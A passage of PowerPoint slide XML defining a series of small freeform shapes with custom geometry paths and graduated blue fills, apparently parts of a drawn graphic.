          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 0 h 104"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T28" fmla="*/ 0 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T35" fmla="*/ 0 h 104"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T37" fmla="*/ 0 h 1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104"/>
              <a:gd name="T59" fmla="*/ 27 w 27"/>
              <a:gd name="T60" fmla="*/ 104 h 1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104">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10431" name="Freeform 512"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843212" y="6357938"/>
            <a:ext cx="39688" cy="184150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T10" fmla="*/ 0 w 17"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T43" fmla="*/ 0 h 82"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T45" fmla="*/ 0 h 82"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 82"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 8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7"/>
              <a:gd name="T79" fmla="*/ 0 h 82"/>
              <a:gd name="T80" fmla="*/ 17 w 17"/>
              <a:gd name="T81" fmla="*/ 82 h 8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7" h="82">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10432" name="Freeform 513"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2846387" y="6370638"/>
            <a:ext cx="31750" cy="155575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T10" fmla="*/ 0 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T12" fmla="*/ 0 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 0 h 69"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 0 h 69"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 0 h 69"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T47" fmla="*/ 0 h 69"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 69"/>
              <a:gd name="T80" fmla="*/ 14 w 14"/>
              <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                <a:moveTo>
                  <a:pt x="5" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10433" name="Freeform 514"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2847975" y="6384925"/>
            <a:ext cx="26987" cy="128588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T8" fmla="*/ 0 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T10" fmla="*/ 0 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T12" fmla="*/ 0 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 57"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 0 h 57"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T39" fmla="*/ 0 h 57"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T41" fmla="*/ 0 h 57"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T43" fmla="*/ 0 h 57"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T45" fmla="*/ 0 h 57"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T47" fmla="*/ 0 h 57"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T49" fmla="*/ 0 h 57"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 57"/>
              <a:gd name="T80" fmla="*/ 12 w 12"/>
              <a:gd name="T81" fmla="*/ 57 h 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 h="57">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10434" name="Freeform 515"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2847975" y="6396038"/>
            <a:ext cx="20637" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T10" fmla="*/ 0 w 9"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T12" fmla="*/ 0 w 9"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T43" fmla="*/ 0 h 45"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T45" fmla="*/ 0 h 45"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T51" fmla="*/ 2147483647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
              <a:gd name="T79" fmla="*/ 0 h 45"/>
              <a:gd name="T80" fmla="*/ 9 w 9"/>
              <a:gd name="T81" fmla="*/ 45 h 4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 h="45">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10435" name="Freeform 516"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2851150" y="6407150"/>
            <a:ext cx="15875" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T6" fmla="*/ 0 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T8" fmla="*/ 0 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T10" fmla="*/ 0 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T12" fmla="*/ 0 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T14" fmla="*/ 0 w 7"/>
